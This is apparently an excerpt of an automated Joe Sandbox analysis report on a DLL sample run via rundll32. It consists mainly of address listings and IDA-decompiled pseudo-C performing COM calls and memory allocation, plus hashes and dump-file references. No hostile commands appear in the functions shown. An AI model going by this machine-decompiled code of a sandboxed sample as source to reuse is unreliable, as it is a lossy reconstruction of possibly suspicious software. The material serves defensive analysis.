                                                                                                            0x1002c231
                                                                                                            0x1002c293
                                                                                                            0x1002c293
                                                                                                            0x1002c294
                                                                                                            0x1002c233
                                                                                                            0x1002c237
                                                                                                            0x1002c241
                                                                                                            0x1002c245
                                                                                                            0x1002c24a
                                                                                                            0x1002c24e
                                                                                                            0x1002c28e
                                                                                                            0x1002c291
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002c250
                                                                                                            0x1002c254
                                                                                                            0x1002c269
                                                                                                            0x1002c272
                                                                                                            0x1002c272
                                                                                                            0x1002c275
                                                                                                            0x1002c282
                                                                                                            0x1002c282
                                                                                                            0x1002c277
                                                                                                            0x1002c27a
                                                                                                            0x1002c27a
                                                                                                            0x1002c285
                                                                                                            0x1002c28b
                                                                                                            0x1002c28b
                                                                                                            0x1002c247
                                                                                                            0x1002c247
                                                                                                            0x1002c2a8
                                                                                                            0x1002c2a8
                                                                                                            0x1002c2a8
                                                                                                            0x1002c239
                                                                                                            0x1002c239
                                                                                                            0x1002c23a
                                                                                                            0x1002c23a
                                                                                                            0x1002c237
                                                                                                            0x1002c231
                                                                                                            0x1002c2a9
                                                                                                            0x1002c2ac
                                                                                                            0x1002c2ad
                                                                                                            0x1002c2ad
                                                                                                            0x1002c2b2
                                                                                                            0x1002c2b3
                                                                                                            0x1002c2b7
                                                                                                            0x1002c2ba
                                                                                                            0x1002c2c8
                                                                                                            0x1002c2cb
                                                                                                            0x1002c2ce
                                                                                                            0x1002c2da
                                                                                                            0x1002c2de
                                                                                                            0x1002c2e1
                                                                                                            0x1002c2e4
                                                                                                            0x1002c2e7
                                                                                                            0x1002c2ed
                                                                                                            0x1002c2f3
                                                                                                            0x1002c2f6
                                                                                                            0x1002c2f9
                                                                                                            0x1002c2fb
                                                                                                            0x1002c2ff
                                                                                                            0x1002c306
                                                                                                            0x1002c306
                                                                                                            0x1002c307
                                                                                                            0x1002c30a
                                                                                                            0x1002c30a
                                                                                                            0x1002c30f
                                                                                                            0x1002c312
                                                                                                            0x1002c324
                                                                                                            0x1002c329
                                                                                                            0x1002c340
                                                                                                            0x1002c340
                                                                                                            0x1002c340
                                                                                                            0x1002c32b
                                                                                                            0x1002c336
                                                                                                            0x1002c33b
                                                                                                            0x1002c33b
                                                                                                            0x1002c347
                                                                                                            0x1002c34b
                                                                                                            0x1002c34f
                                                                                                            0x1002c352
                                                                                                            0x1002c355
                                                                                                            0x1002c358
                                                                                                            0x1002c35b
                                                                                                            0x1002c35f
                                                                                                            0x1002c366
                                                                                                            0x1002c369
                                                                                                            0x1002c372
                                                                                                            0x1002c37a
                                                                                                            0x1002c386
                                                                                                            0x1002c38b
                                                                                                            0x1002c38e
                                                                                                            0x1002c392
                                                                                                            0x1002c398
                                                                                                            0x1002c399
                                                                                                            0x1002c39a
                                                                                                            0x1002c39b
                                                                                                            0x1002c39c
                                                                                                            0x1002c39f
                                                                                                            0x1002c39f
                                                                                                            0x1002c3a2
                                                                                                            0x1002c3a5
                                                                                                            0x1002c3ab
                                                                                                            0x1002c3ab
                                                                                                            0x1002c35b
                                                                                                            0x1002c312
                                                                                                            0x1002c3b0
                                                                                                            0x1002c3b5
                                                                                                            0x1002c3be
                                                                                                            0x1002c3be
                                                                                                            0x1002c3c1
                                                                                                            0x1002c3c3
                                                                                                            0x1002c3c5
                                                                                                            0x1002c3ca
                                                                                                            0x1002c3cd
                                                                                                            0x1002c3d3
                                                                                                            0x1002c3d8
                                                                                                            0x1002c3dc
                                                                                                            0x1002c3dd
                                                                                                            0x1002c3cd
                                                                                                            0x1002c3e1
                                                                                                            0x1002c3e6
                                                                                                            0x1002c3eb
                                                                                                            0x1002c3ee
                                                                                                            0x1002c3f1
                                                                                                            0x1002c3f6
                                                                                                            0x1002c3fd
                                                                                                            0x1002c400
                                                                                                            0x1002c409
                                                                                                            0x1002c417
                                                                                                            0x1002c425
                                                                                                            0x1002c42c
                                                                                                            0x1002c44b
                                                                                                            0x1002c44b
                                                                                                            0x1002c450
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c453
                                                                                                            0x1002c458
                                                                                                            0x1002c45b
                                                                                                            0x1002c460
                                                                                                            0x1002c464
                                                                                                            0x1002c467
                                                                                                            0x1002c467
                                                                                                            0x1002c46d
                                                                                                            0x1002c46e
                                                                                                            0x1002c473
                                                                                                            0x1002c211
                                                                                                            0x1002c1ed
                                                                                                            0x1002c478
                                                                                                            0x1002c48d
                                                                                                            0x1002c49a
                                                                                                            0x1002c4a5
                                                                                                            0x1002c4b3
                                                                                                            0x1002c4b8
                                                                                                            0x1002c4c1
                                                                                                            0x1002c4c3
                                                                                                            0x1002c4c3
                                                                                                            0x1002c4c6
                                                                                                            0x1002c4cc
                                                                                                            0x1002c4ce
                                                                                                            0x1002c4ce
                                                                                                            0x1002c4d1
                                                                                                            0x1002c4d7
                                                                                                            0x1002c4dc
                                                                                                            0x1002c4e0

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Empty$Window
                                                                                                            • String ID: @
                                                                                                            • API String ID: 444217639-2766056989
                                                                                                            • Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                                                            • Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
                                                                                                            • Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                                                            • Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000E14F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E10011BF0(0x1003af36, _t263);
				_t130 =  *0x1004c470; // 0x6edecb8c
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x10043008);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E1000B1A4(_t263 - 0x70, 0x10043744);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E1000B1A4(_t263 - 0x40, 0x1004372c);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x10043208);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x10043348);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E1001F77E(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E1000B427(_t229, _t172 + 4);
						}
						if(E1001F77E(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E10009E9C(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E1000DB7F(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E1001F77E(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E1001E0EA(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E10006D96(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E1001E047( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}




































                                                                                                            0x1000e154
                                                                                                            0x1000e15f
                                                                                                            0x1000e166
                                                                                                            0x1000e168
                                                                                                            0x1000e16f
                                                                                                            0x1000e17d
                                                                                                            0x1000e180
                                                                                                            0x1000e2ad
                                                                                                            0x1000e2b2
                                                                                                            0x1000e2c0
                                                                                                            0x1000e2c4
                                                                                                            0x1000e2c5
                                                                                                            0x1000e2ca
                                                                                                            0x1000e2d0
                                                                                                            0x1000e2e1
                                                                                                            0x1000e2e6
                                                                                                            0x1000e2f5
                                                                                                            0x1000e2f8
                                                                                                            0x1000e2fb
                                                                                                            0x1000e302
                                                                                                            0x1000e305
                                                                                                            0x1000e30c
                                                                                                            0x1000e311
                                                                                                            0x1000e314
                                                                                                            0x1000e321
                                                                                                            0x1000e328
                                                                                                            0x1000e32b
                                                                                                            0x1000e332
                                                                                                            0x1000e335
                                                                                                            0x1000e342
                                                                                                            0x1000e346
                                                                                                            0x1000e365
                                                                                                            0x1000e36b
                                                                                                            0x1000e371
                                                                                                            0x1000e37b
                                                                                                            0x1000e381
                                                                                                            0x1000e387
                                                                                                            0x1000e390
                                                                                                            0x1000e395
                                                                                                            0x1000e39b
                                                                                                            0x1000e3b7
                                                                                                            0x1000e3ba
                                                                                                            0x1000e3c0
                                                                                                            0x1000e3c3
                                                                                                            0x1000e3c6
                                                                                                            0x1000e3c9
                                                                                                            0x1000e3cf
                                                                                                            0x00000000
                                                                                                            0x1000e39d
                                                                                                            0x1000e39d
                                                                                                            0x1000e3a3
                                                                                                            0x1000e3a3
                                                                                                            0x00000000
                                                                                                            0x1000e348
                                                                                                            0x1000e348
                                                                                                            0x1000e34e
                                                                                                            0x1000e351
                                                                                                            0x1000e351
                                                                                                            0x1000e346
                                                                                                            0x1000e2b4
                                                                                                            0x1000e2b4
                                                                                                            0x1000e2b4
                                                                                                            0x1000e186
                                                                                                            0x1000e186
                                                                                                            0x1000e195
                                                                                                            0x1000e19a
                                                                                                            0x1000e1a0
                                                                                                            0x1000e1a6
                                                                                                            0x1000e1ae
                                                                                                            0x1000e1af
                                                                                                            0x1000e1b4
                                                                                                            0x1000e1b9
                                                                                                            0x1000e1bb
                                                                                                            0x1000e1c1
                                                                                                            0x1000e1c2
                                                                                                            0x1000e1c7
                                                                                                            0x1000e1cc
                                                                                                            0x1000e1d2
                                                                                                            0x1000e1d4
                                                                                                            0x1000e1e8
                                                                                                            0x1000e1eb
                                                                                                            0x1000e1f1
                                                                                                            0x1000e1f1
                                                                                                            0x1000e1f4
                                                                                                            0x1000e1fa
                                                                                                            0x1000e1fa
                                                                                                            0x1000e207
                                                                                                            0x1000e215
                                                                                                            0x1000e209
                                                                                                            0x1000e20e
                                                                                                            0x1000e20e
                                                                                                            0x1000e217
                                                                                                            0x1000e21a
                                                                                                            0x1000e220
                                                                                                            0x1000e223
                                                                                                            0x1000e226
                                                                                                            0x1000e22a
                                                                                                            0x1000e231
                                                                                                            0x1000e231
                                                                                                            0x1000e240
                                                                                                            0x1000e251
                                                                                                            0x1000e242
                                                                                                            0x1000e24a
                                                                                                            0x1000e24a
                                                                                                            0x1000e256
                                                                                                            0x1000e25d
                                                                                                            0x1000e268
                                                                                                            0x1000e26e
                                                                                                            0x1000e271
                                                                                                            0x1000e277
                                                                                                            0x1000e27b
                                                                                                            0x1000e28d
                                                                                                            0x1000e290
                                                                                                            0x1000e29b
                                                                                                            0x1000e2a3
                                                                                                            0x1000e3d2
                                                                                                            0x1000e3d5
                                                                                                            0x1000e3d8
                                                                                                            0x1000e3da
                                                                                                            0x1000e3dc
                                                                                                            0x1000e3de
                                                                                                            0x1000e3e4
                                                                                                            0x1000e3e9
                                                                                                            0x1000e3ec
                                                                                                            0x1000e3f9
                                                                                                            0x1000e3ee
                                                                                                            0x1000e3f2
                                                                                                            0x1000e3f2
                                                                                                            0x1000e3fb
                                                                                                            0x1000e402
                                                                                                            0x1000e405
                                                                                                            0x1000e40c
                                                                                                            0x1000e40f
                                                                                                            0x1000e3dc
                                                                                                            0x1000e414
                                                                                                            0x1000e41c
                                                                                                            0x1000e421
                                                                                                            0x1000e428
                                                                                                            0x1000e429
                                                                                                            0x1000e432
                                                                                                            0x1000e435
                                                                                                            0x1000e43d
                                                                                                            0x1000e43f
                                                                                                            0x1000e444
                                                                                                            0x1000e447
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e44e
                                                                                                            0x1000e45b
                                                                                                            0x1000e469
                                                                                                            0x1000e46f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000e44b
                                                                                                            0x1000e471
                                                                                                            0x1000e473
                                                                                                            0x1000e478
                                                                                                            0x1000e47c
                                                                                                            0x1000e482
                                                                                                            0x1000e482
                                                                                                            0x1000e485
                                                                                                            0x1000e488
                                                                                                            0x1000e488
                                                                                                            0x1000e48b
                                                                                                            0x00000000
                                                                                                            0x1000e43a
                                                                                                            0x00000000
                                                                                                            0x1000e48b
                                                                                                            0x1000e43d
                                                                                                            0x1000e48d
                                                                                                            0x1000e493
                                                                                                            0x1000e493
                                                                                                            0x1000e499
                                                                                                            0x1000e499
                                                                                                            0x1000e499
                                                                                                            0x1000e1a0
                                                                                                            0x1000e4a4
                                                                                                            0x1000e4b5

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000E154
                                                                                                            • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
                                                                                                            • CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Task$AllocFreeH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 1522537378-3916222277
                                                                                                            • Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                                                            • Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
                                                                                                            • Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                                                            • Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000B6F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1000B6F5(void* __ecx) {
				intOrPtr* _t76;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t143;
				void* _t146;
				void* _t148;

				E10011BF0(0x1003ae9f, _t148);
				_t146 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t148 - 0x14);
				_push(0x10043128);
				 *((intOrPtr*)(_t148 - 0x14)) = 0;
				_push(_t76);
				 *((intOrPtr*)(_t148 - 0x18)) = 0;
				if( *((intOrPtr*)( *_t76))() >= 0) {
					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
					 *((intOrPtr*)(_t148 - 0x78)) = 0;
					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
					 *((intOrPtr*)(_t148 - 0x50)) = 0;
					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
					E10010592(_t148 - 0x28);
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *((intOrPtr*)(_t148 - 4)) = 0;
					 *(_t148 - 0x6c) = 0;
					 *((intOrPtr*)(_t148 - 0x10)) = 0;
					do {
						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x10040560)), _t148 - 0x28);
						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x10040564);
						}
						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
					_t101 =  *((intOrPtr*)(_t148 - 0x20));
					_push(_t148 - 0x60);
					_push(0x10043178);
					_push(_t101);
					if( *((intOrPtr*)( *_t101))() < 0) {
						 *((intOrPtr*)(_t148 - 0x60)) = 0;
					}
					_t103 =  *((intOrPtr*)(_t148 - 0x14));
					_push(_t148 - 0x40);
					_push(_t148 - 0x80);
					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
					_push(_t103);
					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
						 *((intOrPtr*)(_t148 - 0x18)) = 1;
					}
					_t105 =  *((intOrPtr*)(_t148 - 0x14));
					 *((intOrPtr*)( *_t105 + 8))(_t105);
					_t107 =  *((intOrPtr*)(_t148 - 0x60));
					if(_t107 != 0) {
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					__imp__#9(_t148 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
				return  *((intOrPtr*)(_t148 - 0x18));
			}











                                                                                                            0x1000b6fa
                                                                                                            0x1000b707
                                                                                                            0x1000b709
                                                                                                            0x1000b70c
                                                                                                            0x1000b70f
                                                                                                            0x1000b714
                                                                                                            0x1000b719
                                                                                                            0x1000b71a
                                                                                                            0x1000b721
                                                                                                            0x1000b72d
                                                                                                            0x1000b736
                                                                                                            0x1000b73f
                                                                                                            0x1000b747
                                                                                                            0x1000b74e
                                                                                                            0x1000b751
                                                                                                            0x1000b754
                                                                                                            0x1000b757
                                                                                                            0x1000b75a
                                                                                                            0x1000b762
                                                                                                            0x1000b765
                                                                                                            0x1000b768
                                                                                                            0x1000b76b
                                                                                                            0x1000b76e
                                                                                                            0x1000b780
                                                                                                            0x1000b78a
                                                                                                            0x1000b795
                                                                                                            0x1000b795
                                                                                                            0x1000b798
                                                                                                            0x1000b79c
                                                                                                            0x1000b7b0
                                                                                                            0x1000b7c2
                                                                                                            0x1000b7ca
                                                                                                            0x1000b7dc
                                                                                                            0x1000b7e4
                                                                                                            0x1000b7f7
                                                                                                            0x1000b7ff
                                                                                                            0x1000b811
                                                                                                            0x1000b819
                                                                                                            0x1000b81f
                                                                                                            0x1000b827
                                                                                                            0x1000b828
                                                                                                            0x1000b82d
                                                                                                            0x1000b833
                                                                                                            0x1000b835
                                                                                                            0x1000b835
                                                                                                            0x1000b838
                                                                                                            0x1000b83e
                                                                                                            0x1000b842
                                                                                                            0x1000b843
                                                                                                            0x1000b84c
                                                                                                            0x1000b852
                                                                                                            0x1000b857
                                                                                                            0x1000b85d
                                                                                                            0x1000b863
                                                                                                            0x1000b866
                                                                                                            0x1000b866
                                                                                                            0x1000b86d
                                                                                                            0x1000b873
                                                                                                            0x1000b876
                                                                                                            0x1000b87b
                                                                                                            0x1000b880
                                                                                                            0x1000b880
                                                                                                            0x1000b887
                                                                                                            0x1000b887
                                                                                                            0x1000b895
                                                                                                            0x1000b89d

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearH_prologVariant
                                                                                                            • String ID: @$@
                                                                                                            • API String ID: 1166855276-149943524
                                                                                                            • Opcode ID: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
